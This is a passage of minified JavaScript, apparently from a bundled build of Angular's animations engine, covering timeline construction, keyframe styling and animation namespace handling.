Fe=pe.length-1;Fe>=0;Fe--){const Ne=pe[Fe];if(Ne.element===e){Re=Ne;break}}Re&&!Re.allowOnlyTimelineStyles()&&Re.setStyles([d],null,Y.errors,T)}return pe.length?pe.map(Re=>Re.buildKeyframes()):[L6(e,[],[],[],0,te,"",!1)]}visitTrigger(a,e){}visitState(a,e){}visitTransition(a,e){}visitAnimateChild(a,e){const i=e.subInstructions.get(e.element);if(i){const n=e.createSubContext(a.options),r=e.currentTimeline.currentTime,c=this._visitSubInstructions(i,n,n.options);r!=c&&e.transformIntoNewTimeline(c)}e.previousNode=a}visitAnimateRef(a,e){const i=e.createSubContext(a.options);i.transformIntoNewTimeline(),this._applyAnimationRefDelays([a.options,a.animation.options],e,i),this.visitReference(a.animation,i),e.transformIntoNewTimeline(i.currentTimeline.currentTime),e.previousNode=a}_applyAnimationRefDelays(a,e,i){var n;for(const r of a){const c=null==r?void 0:r.delay;if(c){const d="number"==typeof c?c:Ih(uy(c,null!==(n=null==r?void 0:r.params)&&void 0!==n?n:{},e.errors));i.delayNextStep(d)}}}_visitSubInstructions(a,e,i){let r=e.currentTimeline.currentTime;const c=null!=i.duration?Ih(i.duration):null,d=null!=i.delay?Ih(i.delay):null;return 0!==c&&a.forEach(T=>{const k=e.appendInstructionToTimeline(T,c,d);r=Math.max(r,k.duration+k.delay)}),r}visitReference(a,e){e.updateOptions(a.options,!0),jl(this,a.animation,e),e.previousNode=a}visitSequence(a,e){const i=e.subContextCount;let n=e;const r=a.options;if(r&&(r.params||r.delay)&&(n=e.createSubContext(r),n.transformIntoNewTimeline(),null!=r.delay)){6==n.previousNode.type&&(n.currentTimeline.snapshotCurrentStyles(),n.previousNode=b4);const c=Ih(r.delay);n.delayNextStep(c)}a.steps.length&&(a.steps.forEach(c=>jl(this,c,n)),n.currentTimeline.applyStylesToKeyframe(),n.subContextCount>i&&n.transformIntoNewTimeline()),e.previousNode=a}visitGroup(a,e){const i=[];let n=e.currentTimeline.currentTime;const r=a.options&&a.options.delay?Ih(a.options.delay):0;a.steps.forEach(c=>{const d=e.createSubContext(a.options);r&&d.delayNextStep(r),jl(this,c,d),n=Math.max(n,d.currentTimeline.currentTime),i.push(d.currentTimeline)}),i.forEach(c=>e.currentTimeline.mergeTimelineCollectedStyles(c)),e.transformIntoNewTimeline(n),e.previousNode=a}_visitTiming(a,e){if(a.dynamic){const i=a.strValue;return u4(e.params?uy(i,e.params,e.errors):i,e.errors)}return{duration:a.duration,delay:a.delay,easing:a.easing}}visitAnimate(a,e){const i=e.currentAnimateTimings=this._visitTiming(a.timings,e),n=e.currentTimeline;i.delay&&(e.incrementTime(i.delay),n.snapshotCurrentStyles());const r=a.style;5==r.type?this.visitKeyframes(r,e):(e.incrementTime(i.duration),this.visitStyle(r,e),n.applyStylesToKeyframe()),e.currentAnimateTimings=null,e.previousNode=a}visitStyle(a,e){const i=e.currentTimeline,n=e.currentAnimateTimings;!n&&i.hasCurrentStyleProperties()&&i.forwardFrame();const r=n&&n.easing||a.easing;a.isEmptyStep?i.applyEmptyStep(r):i.setStyles(a.styles,r,e.errors,e.options),e.previousNode=a}visitKeyframes(a,e){const i=e.currentAnimateTimings,n=e.currentTimeline.duration,r=i.duration,d=e.createSubContext().currentTimeline;d.easing=i.easing,a.styles.forEach(T=>{d.forwardTime((T.offset||0)*r),d.setStyles(T.styles,T.easing,e.errors,e.options),d.applyStylesToKeyframe()}),e.currentTimeline.mergeTimelineCollectedStyles(d),e.transformIntoNewTimeline(n+r),e.previousNode=a}visitQuery(a,e){const i=e.currentTimeline.currentTime,n=a.options||{},r=n.delay?Ih(n.delay):0;r&&(6===e.previousNode.type||0==i&&e.currentTimeline.hasCurrentStyleProperties())&&(e.currentTimeline.snapshotCurrentStyles(),e.previousNode=b4);let c=i;const d=e.invokeQuery(a.selector,a.originalSelector,a.limit,a.includeSelf,!!n.optional,e.errors);e.currentQueryTotal=d.length;let T=null;d.forEach((k,q)=>{e.currentQueryIndex=q;const Y=e.createSubContext(a.options,k);r&&Y.delayNextStep(r),k===e.element&&(T=Y.currentTimeline),jl(this,a.animation,Y),Y.currentTimeline.applyStylesToKeyframe(),c=Math.max(c,Y.currentTimeline.currentTime)}),e.currentQueryIndex=0,e.currentQueryTotal=0,e.transformIntoNewTimeline(c),T&&(e.currentTimeline.mergeTimelineCollectedStyles(T),e.currentTimeline.snapshotCurrentStyles()),e.previousNode=a}visitStagger(a,e){const i=e.parentContext,n=e.currentTimeline,r=a.timings,c=Math.abs(r.duration),d=c*(e.currentQueryTotal-1);let T=c*e.currentQueryIndex;switch(r.duration<0?"reverse":r.easing){case"reverse":T=d-T;break;case"full":T=i.currentStaggerTime}const q=e.currentTimeline;T&&q.delayNextStep(T);const Y=q.currentTime;jl(this,a.animation,e),e.previousNode=a,i.currentStaggerTime=n.currentTime-Y+(n.startTime-i.currentTimeline.startTime)}}const b4={};class W6{constructor(a,e,i,n,r,c,d,T){this._driver=a,this.element=e,this.subInstructions=i,this._enterClassName=n,this._leaveClassName=r,this.errors=c,this.timelines=d,this.parentContext=null,this.currentAnimateTimings=null,this.previousNode=b4,this.subContextCount=0,this.options={},this.currentQueryIndex=0,this.currentQueryTotal=0,this.currentStaggerTime=0,this.currentTimeline=T||new M4(this._driver,e,0),d.push(this.currentTimeline)}get params(){return this.options.params}updateOptions(a,e){if(!a)return;const i=a;let n=this.options;null!=i.duration&&(n.duration=Ih(i.duration)),null!=i.delay&&(n.delay=Ih(i.delay));const r=i.params;if(r){let c=n.params;c||(c=this.options.params={}),Object.keys(r).forEach(d=>{(!e||!c.hasOwnProperty(d))&&(c[d]=uy(r[d],c,this.errors))})}}_copyOptions(){const a={};if(this.options){const e=this.options.params;if(e){const i=a.params={};Object.keys(e).forEach(n=>{i[n]=e[n]})}}return a}createSubContext(a=null,e,i){const n=e||this.element,r=new W6(this._driver,n,this.subInstructions,this._enterClassName,this._leaveClassName,this.errors,this.timelines,this.currentTimeline.fork(n,i||0));return r.previousNode=this.previousNode,r.currentAnimateTimings=this.currentAnimateTimings,r.options=this._copyOptions(),r.updateOptions(a),r.currentQueryIndex=this.currentQueryIndex,r.currentQueryTotal=this.currentQueryTotal,r.parentContext=this,this.subContextCount++,r}transformIntoNewTimeline(a){return this.previousNode=b4,this.currentTimeline=this.currentTimeline.fork(this.element,a),this.timelines.push(this.currentTimeline),this.currentTimeline}appendInstructionToTimeline(a,e,i){const n={duration:null!=e?e:a.duration,delay:this.currentTimeline.currentTime+(null!=i?i:0)+a.delay,easing:""},r=new mle(this._driver,a.element,a.keyframes,a.preStyleProps,a.postStyleProps,n,a.stretchStartingKeyframe);return this.timelines.push(r),n}incrementTime(a){this.currentTimeline.forwardTime(this.currentTimeline.duration+a)}delayNextStep(a){a>0&&this.currentTimeline.delayNextStep(a)}invokeQuery(a,e,i,n,r,c){let d=[];if(n&&d.push(this.element),a.length>0){a=(a=a.replace(sle,"."+this._enterClassName)).replace(lle,"."+this._leaveClassName);let k=this._driver.query(this.element,a,1!=i);0!==i&&(k=i<0?k.slice(k.length+i,k.length):k.slice(0,i)),d.push(...k)}return!r&&0==d.length&&c.push(function pce(t){return new gi(3014,!1)}()),d}}class M4{constructor(a,e,i,n){this._driver=a,this.element=e,this.startTime=i,this._elementTimelineStylesLookup=n,this.duration=0,this._previousKeyframe=new Map,this._currentKeyframe=new Map,this._keyframes=new Map,this._styleSummary=new Map,this._localTimelineStyles=new Map,this._pendingStyles=new Map,this._backFill=new Map,this._currentEmptyStepKeyframe=null,this._elementTimelineStylesLookup||(this._elementTimelineStylesLookup=new Map),this._globalTimelineStyles=this._elementTimelineStylesLookup.get(e),this._globalTimelineStyles||(this._globalTimelineStyles=this._localTimelineStyles,this._elementTimelineStylesLookup.set(e,this._localTimelineStyles)),this._loadKeyframe()}containsAnimation(){switch(this._keyframes.size){case 0:return!1;case 1:return this.hasCurrentStyleProperties();default:return!0}}hasCurrentStyleProperties(){return this._currentKeyframe.size>0}get currentTime(){return this.startTime+this.duration}delayNextStep(a){const e=1===this._keyframes.size&&this._pendingStyles.size;this.duration||e?(this.forwardTime(this.currentTime+a),e&&this.snapshotCurrentStyles()):this.startTime+=a}fork(a,e){return this.applyStylesToKeyframe(),new M4(this._driver,a,e||this.currentTime,this._elementTimelineStylesLookup)}_loadKeyframe(){this._currentKeyframe&&(this._previousKeyframe=this._currentKeyframe),this._currentKeyframe=this._keyframes.get(this.duration),this._currentKeyframe||(this._currentKeyframe=new Map,this._keyframes.set(this.duration,this._currentKeyframe))}forwardFrame(){this.duration+=1,this._loadKeyframe()}forwardTime(a){this.applyStylesToKeyframe(),this.duration=a,this._loadKeyframe()}_updateStyle(a,e){this._localTimelineStyles.set(a,e),this._globalTimelineStyles.set(a,e),this._styleSummary.set(a,{time:this.currentTime,value:e})}allowOnlyTimelineStyles(){return this._currentEmptyStepKeyframe!==this._currentKeyframe}applyEmptyStep(a){a&&this._previousKeyframe.set("easing",a);for(let[e,i]of this._globalTimelineStyles)this._backFill.set(e,i||wh),this._currentKeyframe.set(e,wh);this._currentEmptyStepKeyframe=this._currentKeyframe}setStyles(a,e,i,n){var r;e&&this._previousKeyframe.set("easing",e);const c=n&&n.params||{},d=function ule(t,a){const e=new Map;let i;return t.forEach(n=>{if("*"===n){i=i||a.keys();for(let r of i)e.set(r,wh)}else ip(n,e)}),e}(a,this._globalTimelineStyles);for(let[T,k]of d){const q=uy(k,c,i);this._pendingStyles.set(T,q),this._localTimelineStyles.has(T)||this._backFill.set(T,null!==(r=this._globalTimelineStyles.get(T))&&void 0!==r?r:wh),this._updateStyle(T,q)}}applyStylesToKeyframe(){0!=this._pendingStyles.size&&(this._pendingStyles.forEach((a,e)=>{this._currentKeyframe.set(e,a)}),this._pendingStyles.clear(),this._localTimelineStyles.forEach((a,e)=>{this._currentKeyframe.has(e)||this._currentKeyframe.set(e,a)}))}snapshotCurrentStyles(){for(let[a,e]of this._localTimelineStyles)this._pendingStyles.set(a,e),this._updateStyle(a,e)}getFinalKeyframe(){return this._keyframes.get(this.duration)}get properties(){const a=[];for(let e in this._currentKeyframe)a.push(e);return a}mergeTimelineCollectedStyles(a){a._styleSummary.forEach((e,i)=>{const n=this._styleSummary.get(i);(!n||e.time>n.time)&&this._updateStyle(i,e.value)})}buildKeyframes(){this.applyStylesToKeyframe();const a=new Set,e=new Set,i=1===this._keyframes.size&&0===this.duration;let n=[];this._keyframes.forEach((d,T)=>{const k=ip(d,new Map,this._backFill);k.forEach((q,Y)=>{"!"===q?a.add(Y):q===wh&&e.add(Y)}),i||k.set("offset",T/this.duration),n.push(k)});const r=a.size?h4(a.values()):[],c=e.size?h4(e.values()):[];if(i){const d=n[0],T=new Map(d);d.set("offset",0),T.set("offset",1),n=[d,T]}return L6(this.element,n,r,c,this.duration,this.startTime,this.easing,!1)}}class mle extends M4{constructor(a,e,i,n,r,c,d=!1){super(a,e,c.delay),this.keyframes=i,this.preStyleProps=n,this.postStyleProps=r,this._stretchStartingKeyframe=d,this.timings={duration:c.duration,delay:c.delay,easing:c.easing}}containsAnimation(){return this.keyframes.length>1}buildKeyframes(){let a=this.keyframes,{delay:e,duration:i,easing:n}=this.timings;if(this._stretchStartingKeyframe&&e){const r=[],c=i+e,d=e/c,T=ip(a[0]);T.set("offset",0),r.push(T);const k=ip(a[0]);k.set("offset",yO(d)),r.push(k);const q=a.length-1;for(let Y=1;Y<=q;Y++){let te=ip(a[Y]);const pe=te.get("offset");te.set("offset",yO((e+pe*i)/c)),r.push(te)}i=c,e=0,n="",a=r}return L6(this.element,a,this.preStyleProps,this.postStyleProps,i,e,n,!0)}}function yO(t,a=3){const e=Math.pow(10,a-1);return Math.round(t*e)/e}class F6{}const hle=new Set(["width","height","minWidth","minHeight","maxWidth","maxHeight","left","top","bottom","right","fontSize","outlineWidth","outlineOffset","paddingTop","paddingLeft","paddingBottom","paddingRight","marginTop","marginLeft","marginBottom","marginRight","borderRadius","borderWidth","borderTopWidth","borderLeftWidth","borderRightWidth","borderBottomWidth","textIndent","perspective"]);class fle extends F6{normalizePropertyName(a,e){return P6(a)}normalizeStyleValue(a,e,i,n){let r="";const c=i.toString().trim();if(hle.has(e)&&0!==i&&"0"!==i)if("number"==typeof i)r="px";else{const d=i.match(/^[+-]?[\d\.]+([a-z]*)$/);d&&0==d[1].length&&n.push(function nce(t,a){return new gi(3005,!1)}())}return c+r}}function bO(t,a,e,i,n,r,c,d,T,k,q,Y,te){return{type:0,element:t,triggerName:a,isRemovalTransition:n,fromState:e,fromStyles:r,toState:i,toStyles:c,timelines:d,queriedElements:T,preStyleProps:k,postStyleProps:q,totalTime:Y,errors:te}}const V6={};class MO{constructor(a,e,i){this._triggerName=a,this.ast=e,this._stateStyles=i}match(a,e,i,n){return function ple(t,a,e,i,n){return t.some(r=>r(a,e,i,n))}(this.ast.matchers,a,e,i,n)}buildStyles(a,e,i){let n=this._stateStyles.get("*");return void 0!==a&&(n=this._stateStyles.get(null==a?void 0:a.toString())||n),n?n.buildStyles(e,i):new Map}build(a,e,i,n,r,c,d,T,k,q){var Y;const te=[],pe=this.ast.options&&this.ast.options.params||V6,Fe=this.buildStyles(i,d&&d.params||V6,te),Ne=T&&T.params||V6,et=this.buildStyles(n,Ne,te),ut=new Set,Ze=new Map,yt=new Map,It="void"===n,St={params:_le(Ne,pe),delay:null===(Y=this.ast.options)||void 0===Y?void 0:Y.delay},Nt=q?[]:z6(a,e,this.ast.animation,r,c,Fe,et,St,k,te);let oi=0;if(Nt.forEach(vi=>{oi=Math.max(vi.duration+vi.delay,oi)}),te.length)return bO(e,this._triggerName,i,n,It,Fe,et,[],[],Ze,yt,oi,te);Nt.forEach(vi=>{const xi=vi.element,Za=Gl(Ze,xi,new Set);vi.preStyleProps.forEach(en=>Za.add(en));const wa=Gl(yt,xi,new Set);vi.postStyleProps.forEach(en=>wa.add(en)),xi!==e&&ut.add(xi)});const Ai=h4(ut.values());return bO(e,this._triggerName,i,n,It,Fe,et,Nt,Ai,Ze,yt,oi)}}function _le(t,a){const e=dy(a);for(const i in t)t.hasOwnProperty(i)&&null!=t[i]&&(e[i]=t[i]);return e}class gle{constructor(a,e,i){this.styles=a,this.defaultParams=e,this.normalizer=i}buildStyles(a,e){const i=new Map,n=dy(this.defaultParams);return Object.keys(a).forEach(r=>{const c=a[r];null!==c&&(n[r]=c)}),this.styles.styles.forEach(r=>{"string"!=typeof r&&r.forEach((c,d)=>{c&&(c=uy(c,n,e));const T=this.normalizer.normalizePropertyName(d,e);c=this.normalizer.normalizeStyleValue(d,T,c,e),i.set(T,c)})}),i}}class yle{constructor(a,e,i){this.name=a,this.ast=e,this._normalizer=i,this.transitionFactories=[],this.states=new Map,e.states.forEach(n=>{this.states.set(n.name,new gle(n.style,n.options&&n.options.params||{},i))}),vO(this.states,"true","1"),vO(this.states,"false","0"),e.transitions.forEach(n=>{this.transitionFactories.push(new MO(a,n,this.states))}),this.fallbackTransition=function ble(t,a,e){return new MO(t,{type:1,animation:{type:2,steps:[],options:null},matchers:[(c,d)=>!0],options:null,queryCount:0,depCount:0},a)}(a,this.states)}get containsQueries(){return this.ast.queryCount>0}matchTransition(a,e,i,n){return this.transitionFactories.find(c=>c.match(a,e,i,n))||null}matchStyles(a,e,i){return this.fallbackTransition.buildStyles(a,e,i)}}function vO(t,a,e){t.has(a)?t.has(e)||t.set(e,t.get(a)):t.has(e)&&t.set(a,t.get(e))}const Mle=new y4;class vle{constructor(a,e,i){this.bodyNode=a,this._driver=e,this._normalizer=i,this._animations=new Map,this._playersById=new Map,this.players=[]}register(a,e){const i=[],r=O6(this._driver,e,i,[]);if(i.length)throw function vce(t){return new gi(3503,!1)}();this._animations.set(a,r)}_buildPlayer(a,e,i){const n=a.element,r=eO(0,this._normalizer,0,a.keyframes,e,i);return this._driver.animate(n,r,a.duration,a.delay,a.easing,[],!0)}create(a,e,i={}){const n=[],r=this._animations.get(a);let c;const d=new Map;if(r?(c=z6(this._driver,e,r,I6,l4,new Map,new Map,i,Mle,n),c.forEach(q=>{const Y=Gl(d,q.element,new Map);q.postStyleProps.forEach(te=>Y.set(te,null))})):(n.push(function Ace(){return new gi(3300,!1)}()),c=[]),n.length)throw function Tce(t){return new gi(3504,!1)}();d.forEach((q,Y)=>{q.forEach((te,pe)=>{q.set(pe,this._driver.computeStyle(Y,pe,wh))})});const k=tp(c.map(q=>{const Y=d.get(q.element);return this._buildPlayer(q,new Map,Y)}));return this._playersById.set(a,k),k.onDestroy(()=>this.destroy(a)),this.players.push(k),k}destroy(a){const e=this._getPlayer(a);e.destroy(),this._playersById.delete(a);const i=this.players.indexOf(e);i>=0&&this.players.splice(i,1)}_getPlayer(a){const e=this._playersById.get(a);if(!e)throw function Ece(t){return new gi(3301,!1)}();return e}listen(a,e,i,n){const r=E6(e,"","","");return A6(this._getPlayer(a),i,r,n),()=>{}}command(a,e,i,n){if("register"==i)return void this.register(a,n[0]);if("create"==i)return void this.create(a,e,n[0]||{});const r=this._getPlayer(a);switch(i){case"play":r.play();break;case"pause":r.pause();break;case"reset":r.reset();break;case"restart":r.restart();break;case"finish":r.finish();break;case"init":r.init();break;case"setPosition":r.setPosition(parseFloat(n[0]));break;case"destroy":this.destroy(a)}}}const AO="ng-animate-queued",B6="ng-animate-disabled",xle=[],TO={namespaceId:"",setForRemoval:!1,setForMove:!1,hasAnimation:!1,removedBeforeQueried:!1},wle={namespaceId:"",setForMove:!1,setForRemoval:!1,hasAnimation:!1,removedBeforeQueried:!0},Md="__ng_removed";class H6{constructor(a,e=""){this.namespaceId=e;const i=a&&a.hasOwnProperty("value");if(this.value=function kle(t){return null!=t?t:null}(i?a.value:a),i){const r=dy(a);delete r.value,this.options=r}else this.options={};this.options.params||(this.options.params={})}get params(){return this.options.params}absorbOptions(a){const e=a.params;if(e){const i=this.options.params;Object.keys(e).forEach(n=>{null==i[n]&&(i[n]=e[n])})}}}const hy="void",U6=new H6(hy);class Ile{constructor(a,e,i){this.id=a,this.hostElement=e,this._engine=i,this.players=[],this._triggers=new Map,this._queue=[],this._elementListeners=new Map,this._hostClassName="ng-tns-"+a,vd(e,this._hostClassName)}listen(a,e,i,n){if(!this._triggers.has(e))throw function Dce(t,a){return new gi(3302,!1)}();if(null==i||0==i.length)throw function xce(t){return new gi(3303,!1)}();if(!function Ple(t){return"start"==t||"done"==t}(i))throw function wce(t,a){return new gi(3400,!1)}();const r=Gl(this._elementListeners,a,[]),c={name:e,phase:i,callback:n};r.push(c);const d=Gl(this._engine.statesByElement,a,new Map);return d.has(e)||(vd(a,d4),vd(a,d4+"-"+e),d.set(e,U6)),()=>{this._engine.afterFlush(()=>{const T=r.indexOf(c);T>=0&&r.splice(T,1),this._triggers.has(e)||d.delete(e)})}}register(a,e){return!this._triggers.has(a)&&(this._triggers.set(a,e),!0)}_getTrigger(a){const e=this._triggers.get(a);if(!e)throw function Ice(t){return new gi(3401,!1)}();return e}trigger(a,e,i,n=!0){const r=this._getTrigger(e),c=new q6(this.id,e,a);let d=this._engine.statesByElement.get(a);d||(vd(a,d4),vd(a,d4+"-"+e),this._engine.statesByElement.set(a,d=new Map));let T=d.get(e);const k=new H6(i,this.id);if(!(i&&i.hasOwnProperty("value"))&&T&&k.absorbOptions(T.options),d.set(e,k),T||(T=U6),k.value!==hy&&T.value===k.value){if(!function Lle(t,a){const e=Object.keys(t),i=Object.keys(a);if(e.length!=i.length)return!1;for(let n=0;n<e.length;n++){const r=e[n];if(!a.hasOwnProperty(r)||t[r]!==a[r])return!1}return!0}(T.params,k.params)){const Fe=[],Ne=r.matchStyles(T.value,T.params,Fe),et=r.matchStyles(k.value,k.params,Fe);Fe.length?this._engine.reportError(Fe):this._engine.afterFlush(()=>{sg(a,Ne),cu(a,et)})}return}const te=Gl(this._engine.playersByElement,a,[]);te.forEach(Fe=>{Fe.namespaceId==this.id&&Fe.triggerName==e&&Fe.queued&&Fe.destroy()});let pe=r.matchTransition(T.value,k.value,a,k.params),Re=!1;if(!pe){if(!n)return;pe=r.fallbackTransition,Re=!0}return this._engine.totalQueuedPlayers++,this._queue.push({element:a,triggerName:e,transition:pe,fromState:T,toState:k,player:c,isFallbackTransition:Re}),Re||(vd(a,AO),c.onStart(()=>{g1(a,AO)})),c.onDone(()=>{let Fe=this.players.indexOf(c);Fe>=0&&this.players.splice(Fe,1);const Ne=this._engine.playersByElement.get(a);if(Ne){let et=Ne.indexOf(c);et>=0&&Ne.splice(et,1)}}),this.players.push(c),te.push(c),c}deregister(a){this._triggers.delete(a),this._engine.statesByElement.forEach(e=>e.delete(a)),this._elementListeners.forEach((e,i)=>{this._elementListeners.set(i,e.filter(n=>n.name!=a))})}clearElementCache(a){this._engine.statesByElement.delete(a),this._elementListeners.delete(a);const e=this._engine.playersByElement.get(a);e&&(e.forEach(i=>i.destroy()),this._engine.playersByElement.delete(a))}_signalRemovalForInnerTriggers(a,e){const i=this._engine.driver.query(a,m4,!0);i.forEach(n=>{if(n[Md])return;const r=this._engine.fetchNamespacesByElement(n);r.size?r.forEach(c=>c.triggerLeaveAnimation(n,e,!1,!0)):this.clearElementCache(n)}),this._engine.afterFlushAnimationsDone(()=>i.forEach(n=>this.clearElementCache(n)))}triggerLeaveAnimation(a,e,i,n){const r=this._engine.statesByElement.get(a),c=new Map;if(r){const d=[];if(r.forEach((T,k)=>{if(c.set(k,T.value),this._triggers.has(k)){const q=this.trigger(a,k,hy,n);q&&d.push(q)}}),d.length)return this._engine.markElementAsRemoved(this.id,a,!0,e,c),i&&tp(d).onDone(()=>this._engine.processLeaveNode(a)),!0}return!1}prepareLeaveAnimationListeners(a){const e=this._elementListeners.get(a),i=this._engine.statesByElement.get(a);if(e&&i){const n=new Set;e.forEach(r=>{const c=r.name;if(n.has(c))return;n.add(c);const T=this._triggers.get(c).fallbackTransition,k=i.get(c)||U6,q=new H6(hy),Y=new q6(this.id,c,a);this._engine.totalQueuedPlayers++,this._queue.push({element:a,triggerName:c,transition:T,fromState:k,toState:q,player:Y,isFallbackTransition:!0})})}}removeNode(a,e){const i=this._engine;if(a.childElementCount&&this._signalRemovalForInnerTriggers(a,e),this.triggerLeaveAnimation(a,e,!0))return;let n=!1;if(i.totalAnimations){const r=i.players.length?i.playersByQueriedElement.get(a):[];if(r&&r.length)n=!0;else{let c=a;for(;c=c.parentNode;)if(i.statesByElement.get(c)){n=!0;break}}}if(this.prepareLeaveAnimationListeners(a),n)i.markElementAsRemoved(this.id,a,!1,e);else{const r=a[Md];(!r||r===TO)&&(i.afterFlush(()=>this.clearElementCache(a)),i.destroyInnerAnimations(a),i._onRemovalComplete(a,e))}}insertNode(a,e){vd(a,this._hostClassName)}drainQueuedTransitions(a){const e=[];return this._queue.forEach(i=>{const n=i.player;if(n.destroyed)return;const r=i.element,c=this._elementListeners.get(r);c&&c.forEach(d=>{if(d.name==i.triggerName){const T=E6(r,i.triggerName,i.fromState.value,i.toState.value);T._data=a,A6(i.player,d.phase,T,d.callback)}}),n.markedForDestroy?this._engine.afterFlush(()=>{n.destroy()}):e.push(i)}),this._queue=[],e.sort((i,n)=>{const r=i.transition.ast.depCount,c=n.transition.ast.depCount;return 0==r||0==c?r-c:this._engine.driver.containsElement(i.element,n.element)?1:-1})}destroy(a){this.players.forEach(e=>e.destroy()),this._signalRemovalForInnerTriggers(this.hostElement,a)}elementContainsData(a){let e=!1;return this._elementListeners.has(a)&&(e=!0),e=!!this._queue.find(i=>i.element===a)||e,e}}class Rle{constructor(a,e,i){this.bodyNode=a,this.driver=e,this._normalizer=i,this.players=[],this.newHostElements=new Map,this.playersByElement=new Map,this.playersByQueriedElement=new Map,this.statesByElement=new Map,this.disabledNodes=new Set,this.totalAnimations=0,this.totalQueuedPlayers=0,this._namespaceLookup={},this._namespaceList=[],this._flushFns=[],this._whenQuietFns=[],this.namespacesByHostElement=new Map,this.collectedEnterElements=[],this.collectedLeaveElements=[],this.onRemovalComplete=(n,r)=>{}}_onRemovalComplete(a,e){this.onRemovalComplete(a,e)}get queuedPlayers(){const a=[];return this._namespaceList.forEach(e=>{e.players.forEach(i=>{i.queued&&a.push(i)})}),a}createNamespace(a,e){const i=new Ile(a,e,this);return this.bodyNode&&this.driver.containsElement(this.bodyNode,e)?this._balanceNamespaceList(i,e):(this.newHostElements.set(e,i),this.collectEnterElement(e)),this._namespaceLookup[a]=i}_balanceNamespaceList(a,e){const i=this._namespaceList,n=this.namespacesByHostElement;if(i.length-1>=0){let c=!1,d=this.driver.getParentElement(e);for(;d;){const T=n.get(d);if(T){const k=i.indexOf(T);i.splice(k+1,0,a),c=!0;break}d=this.driver.getParentElement(d)}c||i.unshift(a)}else i.push(a);return n.set(e,a),a}register(a,e){let i=this._namespaceLookup[a];return i||(i=this.createNamespace(a,e)),i}registerTrigger(a,e,i){let n=this._namespaceLookup[a];n&&n.register(e,i)&&this.totalAnimations++}destroy(a,e){if(!a)return;const i=this._fetchNamespace(a);this.afterFlush(()=>{this.namespacesByHostElement.delete(i.hostElement),delete this._namespaceLookup[a];const n=this._namespaceList.indexOf(i);n>=0&&this._namespaceList.splice(n,1)}),this.afterFlushAnimationsDone(()=>i.destroy(e))}_fetchNamespace(a){return this._namespaceLookup[a]}fetchNamespacesByElement(a){const e=new Set,i=this.statesByElement.get(a);if(i)for(let n of i.values())if(n.namespaceId){const r=this._fetchNamespace(n.namespaceId);r&&e.add(r)}return e}trigger(a,e,i,n){if(v4(e)){const r=this._fetchNamespace(a);if(r)return r.trigger(e,i,n),!0}return!1}insertNode(a,e,i,n){if(!v4(e))return;const r=e[Md];if(r&&r.setForRemoval){r.setForRemoval=!1,r.setForMove=!0;const c=this.collectedLeaveElements.indexOf(e);c>=0&&this.collectedLeaveElements.splice(c,1)}if(a){const c=this._fetchNamespace(a);c&&c.insertNode(e,i)}n&&this.collectEnterElement(e)}collectEnterElement(a){this.collectedEnterElements.push(a)}markElementAsDisabled(a,e){e?this.disabledNodes.has(a)||(this.disabledNodes.add(a),vd(a,B6)):this.disabledNodes.has(a)&&(this.disabledNodes.delete(a),g1(a,B6))}removeNode(a,e,i,n){if(v4(e)){const r=a?this._fetchNamespace(a):null;if(r?r.removeNode(e,n):this.markElementAsRemoved(a,e,!1,n),i){const c=this.namespacesByHostElement.get(e);c&&c.id!==a&&c.removeNode(e,n)}}else this._onRemovalComplete(e,n)}markElementAsRemoved(a,e,i,n,r){this.collectedLeaveElements.push(e),e[Md]={namespaceId:a,setForRemoval:n,hasAnimation:i,removedBeforeQueried:!1,previousTriggersValues:r}}listen(a,e,i,n,r){return v4(e)?this._fetchNamespace(a).listen(e,i,n,r):()=>{}}_buildInstruction(a,e,i,n,r){return a.transition.build(this.driver,a.element,a.fromState.value,a.toState.value,i,n,a.fromState.options,a.toState.options,e,r)}destroyInnerAnimations(a){let e=this.driver.query(a,m4,!0);e.forEach(i=>this.destroyActiveAnimationsForElement(i)),0!=this.playersByQueriedElement.size&&(e=this.driver.query(a,R6,!0),e.forEach(i=>this.finishActiveQueriedAnimationOnElement(i)))}destroyActiveAnimationsForElement(a){const e=this.playersByElement.get(a);e&&e.forEach(i=>{i.queued?i.markedForDestroy=!0:i.destroy()})}finishActiveQueriedAnimationOnElement(a){const e=this.playersByQueriedElement.get(a);e&&e.forEach(i=>i.finish())}whenRenderingDone(){return new Promise(a=>{if(this.players.length)return tp(this.players).onDone(()=>a());a()})}processLeaveNode(a){var e;const i=a[Md];if(i&&i.setForRemoval){if(a[Md]=TO,i.namespaceId){this.destroyInnerAnimations(a);const n=this._fetchNamespace(i.namespaceId);n&&n.clearElementCache(a)}this._onRemovalComplete(a,i.setForRemoval)}!(null===(e=a.classList)||void 0===e)&&e.contains(B6)&&this.markElementAsDisabled(a,!1),this.driver.query(a,".ng-animate-disabled",!0).forEach(n=>{this.markElementAsDisabled(n,!1)})}flush(a=-1){let e=[];if(this.newHostElements.size&&(this.newHostElements.forEach((i,n)=>this._balanceNamespaceList(i,n)),this.newHostElements.clear()),this.totalAnimations&&this.collectedEnterElements.length)for(let i=0;i<this.collectedEnterElements.length;i++)vd(this.collectedEnterElements[i],"ng-star-inserted");if(this._namespaceList.length&&(this.totalQueuedPlayers||this.collectedLeaveElements.length)){const i=[];try{e=this._flushAnimations(i,a)}finally{for(let n=0;n<i.length;n++)i[n]()}}else for(let i=0;i<this.collectedLeaveElements.length;i++)this.processLeaveNode(this.collectedLeaveElements[i]);if(this.totalQueuedPlayers=0,this.collectedEnterElements.length=0,this.collectedLeaveElements.length=0,this._flushFns.forEach(i=>i()),this._flushFns=[],this._whenQuietFns.length){const i=this._whenQuietFns;this._whenQuietFns=[],e.length?tp(e).onDone(()=>{i.forEach(n=>n())}):i.forEach(n=>n())}}reportError(a){throw function Rce(t){return new gi(3402,!1)}()}_flushAnimations(a,e){const i=new y4,n=[],r=new Map,c=[],d=new Map,T=new Map,k=new Map,q=new Set;this.disabledNodes.forEach(Di=>{q.add(Di);const Pi=this.driver.query(Di,".ng-animate-queued",!0);for(let Oi=0;Oi<Pi.length;Oi++)q.add(Pi[Oi])});const Y=this.bodyNode,te=Array.from(this.statesByElement.keys()),pe=xO(te,this.collectedEnterElements),Re=new Map;let Fe=0;pe.forEach((Di,Pi)=>{const Oi=I6+Fe++;Re.set(Pi,Oi),Di.forEach($i=>vd($i,Oi))});const Ne=[],et=new Set,ut=new Set;for(let Di=0;Di<this.collectedLeaveElements.length;Di++){const Pi=this.collectedLeaveElements[Di],Oi=Pi[Md];Oi&&Oi.setForRemoval&&(Ne.push(Pi),et.add(Pi),Oi.hasAnimation?this.driver.query(Pi,".ng-star-inserted",!0).forEach($i=>et.add($i)):ut.add(Pi))}const Ze=new 